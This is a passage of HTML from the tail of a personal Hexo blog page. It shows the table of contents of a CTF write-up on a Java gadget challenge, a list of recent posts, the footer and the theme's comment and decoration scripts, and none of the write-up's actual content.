class="toc-number">1.</span> <span class="toc-text">[蓝帽杯]Ez_gadget</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.1.</span> <span class="toc-text">审计</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B8%A9%E5%9D%911"><span class="toc-number">1.2.</span> <span class="toc-text">踩坑1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B8%A9%E5%9D%912"><span class="toc-number">1.3.</span> <span class="toc-text">踩坑2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E5%A4%8D%E7%8E%B0"><span class="toc-number">1.4.</span> <span class="toc-text">本地复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.5.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#EL%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">1.5.1.</span> <span class="toc-text">EL表达式</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B0%8F%E8%AE%B0"><span class="toc-number">1.6.</span> <span class="toc-text">小记</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/08/01/%E5%BC%BA%E7%BD%91%E6%9D%AF%E9%83%A8%E5%88%86WP/" title="强网杯部分WP">强网杯部分WP</a><time datetime="2022-08-01T09:32:04.770Z" title="发表于 2022-08-01 17:32:04">2022-08-01</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/07/28/%E7%A2%8E%E7%A2%8E%E5%BF%B5ing/" title="碎碎念ing">碎碎念ing</a><time datetime="2022-07-28T06:07:15.000Z" title="发表于 2022-07-28 14:07:15">2022-07-28</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/07/27/Java%E5%88%9D%E6%AD%A5%E5%AD%A6%E4%B9%A0%E2%85%A5/" title="Java初步学习Ⅵ">Java初步学习Ⅵ</a><time datetime="2022-07-27T12:33:10.000Z" title="发表于 2022-07-27 20:33:10">2022-07-27</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/07/25/DASCTF2022-07%E8%B5%8B%E8%83%BD%E8%B5%9B/" title="DASCTF2022 07赋能赛">DASCTF2022 07赋能赛</a><time datetime="2022-07-25T07:05:36.000Z" title="发表于 2022-07-25 15:05:36">2022-07-25</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2022/07/22/JavaDeserializeLabs/" title="JavaDeserializeLabs">JavaDeserializeLabs</a><time datetime="2022-07-22T12:04:51.000Z" title="发表于 2022-07-22 20:04:51">2022-07-22</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By Ameuu</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="浅色和深色模式转换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><a id="to_comment" href="#post-comment" title="直达评论"><i class="fas fa-comments"></i></a><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><div class="js-pjax"><script>function loadValine () {
  function initValine () {
    const valine = new Valine(Object.assign({
      el: '#vcomment',
      appId: '',
      appKey: '',
      avatar: 'monsterid',
      serverURLs: '',
      emojiMaps: "",
      path: window.location.pathname,
      visitor: false
    }, null))
  }

  if (typeof Valine === 'function') initValine() 
  else getScript('https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js').then(initValine)
}

if ('Valine' === 'Valine' || !false) {
  if (false) btf.loadComment(document.getElementById('vcomment'),loadValine)
  else setTimeout(loadValine, 0)
} else {
  function loadOtherComment () {
    loadValine()
  }
}</script></div><script defer="defer" id="fluttering_ribbon" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-fluttering-ribbon.min.js"></script><script id="canvas_nest" defer="defer" color="0,0,255" opacity="0.7" zIndex="-1" count="99" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-nest.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script id="click-heart" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/click-heart.min.js" async="async" mobile="false"></script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>